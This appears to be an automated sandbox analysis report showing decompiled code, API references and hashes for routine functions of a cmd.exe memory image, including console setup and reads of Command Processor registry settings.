0x00da341d
0x00da341f
0x00da3422
0x00da3422
0x00da3425
0x00da3428
0x00da342f
0x00da3434
0x00da343a
0x00da346b
0x00000000
0x00da343c
0x00da343c
0x00da3441
0x00da3448
0x00da34d1
0x00da344e
0x00da344e
0x00da3450
0x00da3454
0x00da345d
0x00da3458
0x00da345a
0x00da345a
0x00da3462
0x00da3465
0x00da346f
0x00da3478
0x00da3486
0x00da348f
0x00da34a1
0x00da34a9
0x00da34ad
0x00000000
0x00da34ad
0x00da3448
0x00da343a
0x00000000
0x00da3401
0x00da33fa
0x00da33fc
0x00000000
0x00da33fc
0x00000000
0x00da33c5
0x00da33bc
0x00da33be
0x00da33c1
0x00000000
0x00da33c1
0x00da34d2
0x00da34d6
0x00000000
0x00da34b6
0x00da34c5
0x00000000
0x00da34cd
0x00da34e2
0x00da34e4
0x00da34e9
0x00da34e9
0x00da3275
0x00da3275
0x00da3277
0x00da3277
0x00da3273
0x00da3257
0x00da34f6
0x00da34f7
0x00da34f8
0x00da3503

APIs

FindFirstFileW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,00D8250C,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00DA3362
FindNextFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000010), ref: 00DA34BF
FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 00DA34D6

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: Find$File$CloseFirstNext
String ID:
API String ID: 3541575487-0
Opcode ID: 6e878567dc285b4ca92b7c258f9ca79a3cfdff2a29140b4ae07e5838e9b4cc00
Instruction ID: 7510e56887b26d8f62f531a9f722789df796c137edfa1a51f2cadf08db1f829e
Opcode Fuzzy Hash: 6e878567dc285b4ca92b7c258f9ca79a3cfdff2a29140b4ae07e5838e9b4cc00
Instruction Fuzzy Hash: 6391DE356083028BCB25EF28C85156BB7E3EF99340B59892DF886C7350EB71DE46C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 00D8443C, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E00D8443C(void* __ecx) {
				signed char _t5;
				void* _t12;

				_t12 = __ecx;
				_t5 = GetVersion();
				_push(E00D84476());
				_push(_t5 >> 0x10);
				_push(_t5 >> 0x00000008 & 0x000000ff);
				return E00D9274C(_t12, 0x20, L"%d.%d.%05d.%d", _t5 & 0x000000ff);
			}

0x00d84440
0x00d84448
0x00d8444f
0x00d8445a
0x00d84461
0x00d84475

APIs

GetVersion.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,00DA731D,?,?,?,?,?), ref: 00D84442

Part of subcall function 00D84476: RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,Software\Microsoft\Windows NT\CurrentVersion,00000000,02000000,?), ref: 00D8449A
Part of subcall function 00D84476: RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,UBR,00000000,?,?,?), ref: 00D844BE
Part of subcall function 00D84476: RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?), ref: 00D844C9

Strings

%d.%d.%05d.%d, xrefs: 00D84463

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: CloseOpenQueryValueVersion
String ID: %d.%d.%05d.%d
API String ID: 2996790148-3457777122
Opcode ID: 9b9a49811fe01333eea012c1b065a50901351ca2c22f685bc3943480e035f8f9
Instruction ID: aa2986aed9883a6602bad0ae2e528f0c9b9eea609ae953984d81f2d2cbc29569
Opcode Fuzzy Hash: 9b9a49811fe01333eea012c1b065a50901351ca2c22f685bc3943480e035f8f9
Instruction Fuzzy Hash: 2FD02BF17102213BD61435AA0C5AE7B908EC6C8211740802EB841E23C2D8E85C1942B4

Uniqueness

Uniqueness Score: -1.00%

Function 00DA2258, Relevance: 1.5, APIs: 1, Instructions: 34COMMON

Download Yara Rule

APIs

IsDebuggerPresent.API-MS-WIN-CORE-DEBUG-L1-1-0(?,00000006,?,00DA2418), ref: 00DA228B

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: DebuggerPresent
String ID:
API String ID: 1347740429-0
Opcode ID: 71749a2bf40c1fd3ccd69c10cc77dd63ee2d9f36b8003066b0ab87b495605a01
Instruction ID: 5dfe2d570b4956f0002e9a2e4ce00d3433ffd0725353a97782a8dcae6c240134
Opcode Fuzzy Hash: 71749a2bf40c1fd3ccd69c10cc77dd63ee2d9f36b8003066b0ab87b495605a01
Instruction Fuzzy Hash: B5F0A730A1422BAF8B109F7AA906B7A7799AB56700F540559E807C7641CA24DD05A7B8

Uniqueness

Uniqueness Score: -1.00%

Function 00D97310, Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00D97310() {

				SetUnhandledExceptionFilter(E00D972C0);
				return 0;
			}

0x00d97315
0x00d9731d

APIs

SetUnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(Function_000172C0), ref: 00D97315

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: eee8a01925348b34f1d208c21b7034890e435ef6eb179e913aee3456309b66a1
Instruction ID: 1146ebe5478be2430599544dcdd67408ed0498e6ba92a557af64bd0c491774cd
Opcode Fuzzy Hash: eee8a01925348b34f1d208c21b7034890e435ef6eb179e913aee3456309b66a1
Instruction Fuzzy Hash: E79002603756128A8F1037715C1D805A6A05B997027454590B001C5154DA60410C6539

Uniqueness

Uniqueness Score: -1.00%

Function 00D93D27, Relevance: 51.0, APIs: 25, Strings: 4, Instructions: 299
memorylibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E00D93D27(void* __ebx, intOrPtr* __ecx) {
				signed int _v8;
				char _v72;
				struct _CONSOLE_SCREEN_BUFFER_INFO _v96;
				void* _v100;
				intOrPtr* _v104;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t26;
				void* _t29;
				void* _t30;
				WCHAR* _t36;
				intOrPtr _t57;
				WCHAR* _t59;
				int _t60;
				WCHAR* _t72;
				struct HINSTANCE__* _t76;
				intOrPtr* _t80;
				int _t88;
				WCHAR* _t89;
				WCHAR* _t91;
				void* _t95;
				void* _t98;
				short _t100;
				intOrPtr* _t109;
				WCHAR* _t113;
				short _t122;
				short* _t125;
				void* _t129;
				long _t131;
				intOrPtr* _t133;
				intOrPtr* _t134;
				void* _t135;
				void* _t136;
				void* _t137;
				signed int _t138;
				void* _t139;

				_t95 = __ebx;
				_t26 =  *0xdad0b4; // 0x35c4fbb8
				_v8 = _t26 ^ _t138;
				_t133 = __ecx;
				_v104 = __ecx;
				 *0xdb3858 = 0xdb385c;
				InitializeCriticalSection(0xdb385c);
				EnterCriticalSection( *0xdb3858);
				_t131 = 0;
				 *0xdad544 = 0;
				LeaveCriticalSection( *0xdb3858);
				_t29 = SetConsoleCtrlHandler(E00DA6D90, 1);
				__imp___get_osfhandle(0xdb387c);
				_t30 = GetConsoleMode(_t29, 1);
				__imp___get_osfhandle(0, 0xdb3878);
				_pop(_t98);
				GetConsoleMode(_t30, ??);
				E00D906C0(_t98);
				 *0xdb3834 = E00D93AAE();
				 *0xdb3830 = E00D93B2C(_t98);
				E00D941DD(_t133);
				_t36 = GetCommandLineW();
				_t3 =  &(_t36[1]); // 0x2
				_t125 = _t3;
				do {
					_t100 =  *_t36;
					_t36 =  &(_t36[1]);
				} while (_t100 != 0);
				_t144 = (_t36 - _t125 >> 1) + 1 - 0x2000;
				if((_t36 - _t125 >> 1) + 1 > 0x2000) {
					_push(0);
					E00D8C5A2(0x2000);
					_t103 = 0x400023df;
					do {
						__eflags = E00D94B60(__eflags, 0);
					} while (__eflags == 0);
					L21:
					exit(1);
					L22:
					_push(_t131);
					E00D8C5A2(_t103);
					_t103 = 0x2374;
					do {
						__eflags = E00D94B60(__eflags, _t131);
					} while (__eflags == 0);
					goto L21;
				}
				_t103 =  &_v100;
				E00D92A7C( &_v100, 0x2000, _t144);
				_t134 = _v100;
				if(_t134 == 0) {
					goto L22;
				}
				E00D91040(_t134, 0x2000, GetCommandLineW());
				if(E00D90C70(0xdc3ab0, ((0 |  *0xdc3cbc == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
					_push(0);
					E00D8C5A2(0xdc3ab0);
					_t103 = 0x2374;
					do {
						__eflags = E00D94B60(__eflags, 0);
					} while (__eflags == 0);
					goto L21;
				}
				_t108 =  *0xdc3cb8;
				if( *0xdc3cb8 == 0) {
					_t108 = 0xdc3ab0;
				}
				E00D936CB(_t95, _t108,  *0xdc3cc0, _t131);
				E00D8CEA9();
				_t109 = _t134;
				_t129 = _t109 + 2;
				do {
					_t57 =  *_t109;
					_t109 = _t109 + 2;
					_t149 = _t57 - _t131;
				} while (_t57 != _t131);
				E00D8D3F4(_v104, _t149, _t134, _t109 - _t129 >> 1);
				_t59 =  *0xdc3cb8;
				_t130 = 0xdc3ab0;
				_t113 = _t59;
				if(_t59 == 0) {
					_t113 = 0xdc3ab0;
				}
				_t135 = 0x5c;
				_t136 = _v100;
				if( *_t113 == _t135) {
					_t103 = _t59;
					__eflags = _t59;
					if(_t59 == 0) {
						_t103 = _t130;
					}
					_t137 = 0x5c;
					__eflags = _t103[1] - _t137;
					_t136 = _v100;
					if(_t103[1] != _t137) {
						goto L10;
					} else {
						__eflags =  *0xdc8528;
						if( *0xdc8528 != 0) {
							goto L10;
						}
						__eflags = _t59;
						if(_t59 == 0) {
							_t59 = _t130;
						}
						E00D8C5A2(_t103, 0x400023c8, 1, _t59);
						_t91 =  *0xdc3cb8;
						_t139 = _t139 + 0xc;
						__eflags = _t91;
						if(_t91 == 0) {
							_t91 = 0xdc3ab0;
						}
						__eflags = GetWindowsDirectoryW(_t91,  *0xdc3cc0);
						if(__eflags == 0) {
							do {
								__eflags = E00D94B60(__eflags, _t131);
							} while (__eflags == 0);
							goto L21;
						} else {
							_t124 =  *0xdc3cb8;
							__eflags =  *0xdc3cb8;
							if(__eflags == 0) {
								_t124 = 0xdc3ab0;
							}
							_t130 = 0;
							E00D933FC(_t95, _t124, 0, _t131, _t136, __eflags);
							goto L10;
						}
					}
				} else {
					L10:
					_t60 = GetConsoleOutputCP();
					 *0xdb3854 = _t60;
					GetCPInfo(_t60, 0xdb3840);
					E00D93F80();
					_t64 = HeapAlloc(GetProcessHeap(), _t131, 0x20c);
					 *0xdb3874 = _t64;
					if(_t64 != 0 && _t64 == 0) {
						_t64 =  *0xdb3874;
						 *( *0xdb3874) = 0;
					}
					if( *0xdc3ccc == _t131) {
						__eflags = E00D9269C(_t64);
						if(__eflags == 0) {
							goto L13;
						}
						__eflags =  *0xdad5a0 - _t131; // 0x0
						if(__eflags != 0) {
							L51:
							_t122 =  *0xdad5a0; // 0x0
							E00DA7DF1(_t122, _t136);
							goto L13;
						}
						_t88 = GetConsoleScreenBufferInfo(GetStdHandle(0xfffffff5),  &_v96);
						__eflags = _t88;
						if(_t88 == 0) {
							_t89 =  *0xdad5a0; // 0x0
						} else {
							_t89 = _v96.wAttributes;
							 *0xdad5a0 = _t89;
						}
						__eflags = _t89;
						if(__eflags == 0) {
							goto L13;
						} else {
							goto L51;
						}
					} else {
						L13:
						if( *((intOrPtr*)(_v104 + 8)) == _t131) {
							_v100 = E00DA6456(__eflags);
							E00D8443C( &_v72);
							E00D8C108( &_v72, 0x2350, 1,  &_v72);
							E00D925D9(L"\r\n");
							_t72 = _v100;
							__eflags = _t72;
							if(_t72 == 0) {
								_push(_t131);
								_push(8);
								E00D8C5A2( &_v72);
							} else {
								_push(_t72);
								E00D925D9(L"%s");
								E00D925D9(L"\r\n");
							}
							GlobalFree(_v100);
						}
						_t76 = GetModuleHandleW(L"KERNEL32.DLL");
						 *0xdad0d0 = _t76;
						 *0xdb388c = GetProcAddress(_t76, "CopyFileExW");
						GetProcAddress( *0xdad0d0, "IsDebuggerPresent");
						 *0xdb3888 = GetProcAddress( *0xdad0d0, "SetConsoleInputExeNameW");
						_t80 = _v104;
						if( *_t80 != _t131 ||  *((intOrPtr*)(_t80 + 4)) != _t131 ||  *((intOrPtr*)(_t80 + 8)) != _t131) {
							_t131 = 1;
						}
						__imp__??_V@YAXPAX@Z();
						return E00D96FD0(_t131, _t95, _v8 ^ _t138, _t130, _t131, _t136, _t136);
					}
				}
			}

0x00d93d27
0x00d93d2f
0x00d93d36
0x00d93d3f
0x00d93d43
0x00d93d46
0x00d93d4b
0x00d93d57
0x00d93d63
0x00d93d65
0x00d93d6b
0x00d93d78
0x00d93d85
0x00d93d8d
0x00d93d99
0x00d93d9f
0x00d93da1
0x00d93da7
0x00d93db1
0x00d93dbd
0x00d93dc2
0x00d93dc7
0x00d93dcd
0x00d93dcd
0x00d93dd0
0x00d93dd0
0x00d93dd3
0x00d93dd6
0x00d93de5
0x00d93de7
0x00d9e043
0x00d9e049
0x00d9e04f
0x00d9e050
0x00d9e056
0x00d9e056
0x00d9e05a
0x00d9e05c
0x00d9e062
0x00d9e062
0x00d9e068
0x00d9e06e
0x00d9e06f
0x00d9e075
0x00d9e075
0x00000000
0x00d9e079
0x00d93def
0x00d93df2
0x00d93df7
0x00d93dfc
0x00000000
0x00000000
0x00d93e10
0x00d93e38
0x00d9e07b
0x00d9e081
0x00d9e087
0x00d9e088
0x00d9e08e
0x00d9e08e
0x00000000
0x00d9e092
0x00d93e3e
0x00d93e46
0x00d9e094
0x00d9e094
0x00d93e53
0x00d93e58
0x00d93e5d
0x00d93e5f
0x00d93e62
0x00d93e62
0x00d93e65
0x00d93e68
0x00d93e68
0x00d93e76
0x00d93e7b
0x00d93e80
0x00d93e85
0x00d93e89
0x00d9e09e
0x00d9e09e
0x00d93e91
0x00d93e95
0x00d93e98
0x00d9e0a5
0x00d9e0a7
0x00d9e0a9
0x00d9e0ab
0x00d9e0ab
0x00d9e0af
0x00d9e0b0
0x00d9e0b4
0x00d9e0b7
0x00000000
0x00d9e0bd
0x00d9e0bd
0x00d9e0c4
0x00000000
0x00000000
0x00d9e0ca
0x00d9e0cc
0x00d9e0ce
0x00d9e0ce
0x00d9e0d8
0x00d9e0dd
0x00d9e0e2
0x00d9e0e5
0x00d9e0e7
0x00d9e0e9
0x00d9e0e9
0x00d9e0fb
0x00d9e0fd
0x00d9e11a
0x00d9e120
0x00d9e120
0x00000000
0x00d9e0ff
0x00d9e0ff
0x00d9e105
0x00d9e107
0x00d9e109
0x00d9e109
0x00d9e10e
0x00d9e110
0x00000000
0x00d9e110
0x00d9e0fd
0x00d93e9e
0x00d93e9e
0x00d93e9e
0x00d93eaa
0x00d93eaf
0x00d93eb5
0x00d93ec7
0x00d93ecd
0x00d93ed4
0x00d9e129
0x00d9e130
0x00d9e130
0x00d93ef0
0x00d9e140
0x00d9e142
0x00000000
0x00000000
0x00d9e148
0x00d9e14f
0x00d9e183
0x00d9e183
0x00d9e189
0x00000000
0x00d9e189
0x00d9e15e
0x00d9e164
0x00d9e166
0x00d9e174
0x00d9e168
0x00d9e168
0x00d9e16c
0x00d9e16c
0x00d9e17a
0x00d9e17d
0x00000000
0x00000000
0x00000000
0x00000000
0x00d93ef6
0x00d93ef6
0x00d93efc
0x00d9e19b
0x00d9e19e
0x00d9e1ae
0x00d9e1b8
0x00d9e1bd
0x00d9e1c3
0x00d9e1c5
0x00d9e1e1
0x00d9e1e2
0x00d9e1e4
0x00d9e1c7
0x00d9e1c7
0x00d9e1cd
0x00d9e1d7
0x00d9e1dc
0x00d9e1ef
0x00d9e1ef
0x00d93f07
0x00d93f13
0x00d93f29
0x00d93f2e
0x00d93f45
0x00d93f4a
0x00d93f4f
0x00d93f5d
0x00d93f5d
0x00d93f5f
0x00d93f77
0x00d93f77
0x00d93ef0

APIs

InitializeCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(00DB385C), ref: 00D93D4B
EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00D93D57
LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00D93D6B
SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0(00DA6D90,00000001), ref: 00D93D78
_get_osfhandle.MSVCRT ref: 00D93D85
GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00D93D8D
_get_osfhandle.MSVCRT ref: 00D93D99
GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00D93DA1

Part of subcall function 00D906C0: _get_osfhandle.MSVCRT ref: 00D906D8
Part of subcall function 00D906C0: SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,00DA38A5), ref: 00D906E2
Part of subcall function 00D906C0: _get_osfhandle.MSVCRT ref: 00D906EF
Part of subcall function 00D906C0: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00D906F9
Part of subcall function 00D906C0: _get_osfhandle.MSVCRT ref: 00D9071E
Part of subcall function 00D906C0: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00D90728
Part of subcall function 00D906C0: _get_osfhandle.MSVCRT ref: 00D90750
Part of subcall function 00D906C0: SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00D9075A

Part of subcall function 00D93AAE: GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000,00000000,00D93A9F), ref: 00D93AB2
Part of subcall function 00D93AAE: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000000,00000000), ref: 00D93ACD
Part of subcall function 00D93AAE: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 00D93AD4
Part of subcall function 00D93AAE: memcpy.MSVCRT ref: 00D93AE3
Part of subcall function 00D93AAE: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000), ref: 00D93AEC

Part of subcall function 00D93B2C: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000004,?,00D93DBB), ref: 00D93B33
Part of subcall function 00D93B2C: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00D93DBB), ref: 00D93B3A

Part of subcall function 00D941DD: RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,Software\Microsoft\Command Processor,00000000,02000000,?), ref: 00D9423D
Part of subcall function 00D941DD: RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,DisableUNCCheck,00000000,?,?,?), ref: 00D9427D
Part of subcall function 00D941DD: RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,EnableExtensions,00000000,00000001,?,00001000), ref: 00D942B7
Part of subcall function 00D941DD: RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,DelayedExpansion,00000000,00000001,?,00001000), ref: 00D94307
Part of subcall function 00D941DD: RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,DefaultColor,00000000,00000001,?,00001000), ref: 00D94341

GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00D93DC7
GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00D93E02
GetConsoleOutputCP.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,-00000105,00000000), ref: 00D93E9E
GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00DB3840), ref: 00D93EAF
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,0000020C), ref: 00D93EC0
HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 00D93EC7
GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0(00000000,00000104), ref: 00D93EDC
GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(KERNEL32.DLL), ref: 00D93F07
GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,CopyFileExW), ref: 00D93F18
GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(IsDebuggerPresent), ref: 00D93F2E
GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(SetConsoleInputExeNameW), ref: 00D93F3F
??_V@YAXPAX@Z.MSVCRT ref: 00D93F5F

Strings

KERNEL32.DLL, xrefs: 00D93F02
SetConsoleInputExeNameW, xrefs: 00D93F34
CopyFileExW, xrefs: 00D93F0D
IsDebuggerPresent, xrefs: 00D93F1E

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: Console$HeapMode_get_osfhandle$QueryValue$AddressAllocCriticalProcProcessSection$CommandEnvironmentLineStrings$CtrlEnterFreeHandleHandlerInfoInitializeLeaveModuleOpenOutputTitlememcpy
String ID: CopyFileExW$IsDebuggerPresent$KERNEL32.DLL$SetConsoleInputExeNameW
API String ID: 570592814-3021193919
Opcode ID: 93eed10cb3f23ac92713b46a08f24f76f772121fbb63caad7ed91102a79be5a6
Instruction ID: 44c2ee1a4975344247bc5cb0b276353228f666ac54d32e035f6dd8004af6843f
Opcode Fuzzy Hash: 93eed10cb3f23ac92713b46a08f24f76f772121fbb63caad7ed91102a79be5a6
Instruction Fuzzy Hash: 17A19F31A00302EBDF14FBA5AC5EE6E77A9EB84700B184119F50AD73A1EB70DA41DB75

Uniqueness

Uniqueness Score: -1.00%

Function 00D941DD, Relevance: 45.8, APIs: 18, Strings: 8, Instructions: 311
registryCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E00D941DD(intOrPtr* __ecx) {
				signed int _v8;
				char _v4100;
				long _v4104;
				int _v4108;
				int _v4112;
				void* _v4116;
				intOrPtr _v4120;
				intOrPtr _v4124;
				char _v4128;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t85;
				int _t88;
				long _t97;
				long _t114;
				long _t127;
				long _t130;
				wchar_t* _t131;
				wchar_t* _t135;
				wchar_t* _t139;
				void* _t144;
				long _t146;
				void* _t151;
				long _t152;
				void* _t153;
				signed int _t159;
				intOrPtr* _t162;
				intOrPtr _t163;
				signed int _t166;
				void* _t167;
				void* _t189;

				E00D98290(0x101c);
				_t85 =  *0xdad0b4; // 0x35c4fbb8
				_v8 = _t85 ^ _t166;
				_t162 = __ecx;
				_v4128 = 0x80000002;
				_v4124 = 0x80000001;
				_t163 = 2;
				 *0xdc3cc9 = 1;
				_t144 =  &_v4128 - __ecx;
				_v4120 = _t163;
				while(1) {
					_t88 = RegOpenKeyExW( *(_t144 + _t162), L"Software\\Microsoft\\Command Processor", 0, 0x2000000,  &_v4116);
					if(_t88 != 0) {
						goto L33;
					}
					_v4108 = _v4108 & _t88;
					_v4112 = 0x1000;
					if(RegQueryValueExW(_v4116, L"DisableUNCCheck", 0,  &_v4108,  &_v4104,  &_v4112) == 0) {
						if(_v4108 != 4) {
							if(_v4108 == 1) {
								_t139 =  &_v4104;
								__imp___wtol(_t139);
								asm("sbb al, al");
								 *0xdc8528 =  ~(_t139 - 1) + 1;
							}
						} else {
							 *0xdc8528 = _v4104 != 0;
						}
					}
					_v4112 = 0x1000;
					_t97 = RegQueryValueExW(_v4116, L"EnableExtensions", 0,  &_v4108,  &_v4104,  &_v4112);
					if(_t97 == 0) {
						if(_v4108 != 4) {
							if(_v4108 == 1) {
								_t135 =  &_v4104;
								__imp___wtol(_t135);
								asm("sbb al, al");
								 *0xdc3cc9 =  ~(_t135 - 1) + 1;
							}
						} else {
							 *0xdc3cc9 = _v4104 != _t97;
						}
					}
					_v4112 = 0x1000;
					if(RegQueryValueExW(_v4116, L"DelayedExpansion", 0,  &_v4108,  &_v4104,  &_v4112) == 0) {
						if(_v4108 != 4) {
							if(_v4108 == 1) {
								_t131 =  &_v4104;
								__imp___wtol(_t131);
								asm("sbb al, al");
								 *0xdc3cc8 =  ~(_t131 - 1) + 1;
							}
						} else {
							 *0xdc3cc8 = _v4104 != 0;
						}
					}
					_v4112 = 0x1000;
					if(RegQueryValueExW(_v4116, L"DefaultColor", 0,  &_v4108,  &_v4104,  &_v4112) != 0) {
						L11:
						_v4112 = 0x1000;
						if(RegQueryValueExW(_v4116, L"CompletionChar", 0,  &_v4108,  &_v4104,  &_v4112) != 0) {
							L19:
							_v4112 = 0x1000;
							if(RegQueryValueExW(_v4116, L"PathCompletionChar", 0,  &_v4108,  &_v4104,  &_v4112) != 0) {
								_t114 =  *0xdad0d4; // 0x20
								0x800 = 0x20;
								L27:
								_t146 =  *0xdad0d8; // 0x20
								if(_t146 != 0x800) {
									L29:
									if(_t189 == 0 && _t146 < 0x800) {
										 *0xdad0d4 = _t146;
									}
									L31:
									_v4112 = 0x1000;
									if(RegQueryValueExW(_v4116, L"AutoRun", 0,  &_v4108,  &_v4104,  &_v4112) == 0) {
										if(_v4108 == 2) {
											_t159 = _v4112 >> 1;
											_t165 =  &_v4100 + _t159 * 2;
											if(ExpandEnvironmentStringsW( &_v4104,  &_v4100 + _t159 * 2, 0x7fe - _t159) == 0) {
												_v4104 = 0;
											} else {
												E00D91040( &_v4104, 0x800, _t165);
											}
											_t163 = _v4120;
										}
										if(_v4104 != 0) {
											 *_t162 = E00D8DF40( &_v4104);
										}
									}
									_t88 = RegCloseKey(_v4116);
									goto L33;
								}
								_t189 = _t114 - 0x800;
								if(_t189 < 0) {
									 *0xdad0d8 = _t114;
									goto L31;
								}
								goto L29;
							}
							if(_v4108 != 4) {
								if(_v4108 != 1) {
									_t114 =  *0xdad0d4; // 0x20
									goto L23;
								}
								_t114 = wcstol( &_v4104, 0, 0);
								_t167 = _t167 + 0xc;
								goto L22;
							} else {
								_t114 = _v4104;
								L22:
								 *0xdad0d4 = _t114;
								L23:
								if(_t114 == 0) {
									0x800 = 0x20;
									L26:
									_t114 = 0x800;
									 *0xdad0d4 = 0x800;
									goto L27;
								}
								_t151 = 0xd;
								0x800 = 0x20;
								if(_t114 == _t151 || _t114 > 0x800) {
									goto L26;
								} else {
									goto L27;
								}
							}
						}
						if(_v4108 != 4) {
							if(_v4108 != 1) {
								_t127 =  *0xdad0d8; // 0x20
								goto L15;
							}
							_t127 = wcstol( &_v4104, 0, 0);
							_t167 = _t167 + 0xc;
							goto L14;
						} else {
							_t127 = _v4104;
							L14:
							 *0xdad0d8 = _t127;
							L15:
							if(_t127 == 0) {
								_t152 = 0x20;
								L18:
								 *0xdad0d8 = _t152;
								goto L19;
							}
							_t153 = 0xd;
							_t152 = 0x20;
							if(_t127 == _t153 || _t127 > _t152) {
								goto L18;
							} else {
								goto L19;
							}
						}
					} else {
						if(_v4108 != 4) {
							if(_v4108 != 1) {
								goto L11;
							}
							_t130 = wcstol( &_v4104, 0, 0);
							_t167 = _t167 + 0xc;
							goto L10;
						} else {
							_t130 = _v4104;
							L10:
							 *0xdad5a0 = _t130;
							goto L11;
						}
					}
					L33:
					_t162 = _t162 + 4;
					_t163 = _t163 - 1;
					_v4120 = _t163;
					if(_t163 == 0) {
						__imp__time();
						srand(_t88);
						return E00D96FD0(_t88, _t144, _v8 ^ _t166, 0x800, _t162, _t163, 0);
					}
				}
			}

0x00d941e7
0x00d941ec
0x00d941f3
0x00d941fb
0x00d941fd
0x00d9420d
0x00d94217
0x00d94218
0x00d9421f
0x00d94221
0x00d94227
0x00d9423d
0x00d94245
0x00000000
0x00000000
0x00d9424b
0x00d9425e
0x00d94285
0x00d9e517
0x00d9e533
0x00d9e539
0x00d9e540
0x00d9e54a
0x00d9e54e
0x00d9e54e
0x00d9e519
0x00d9e520
0x00d9e520
0x00d9e517
0x00d94291
0x00d942b7
0x00d942bf
0x00d942c8
0x00d9e55f
0x00d9e565
0x00d9e56c
0x00d9e576
0x00d9e57a
0x00d9e57a
0x00d942ce
0x00d942d4
0x00d942d4
0x00d942c8
0x00d942e1
0x00d9430f
0x00d9e58b
0x00d9e5a7
0x00d9e5ad
0x00d9e5b4
0x00d9e5be
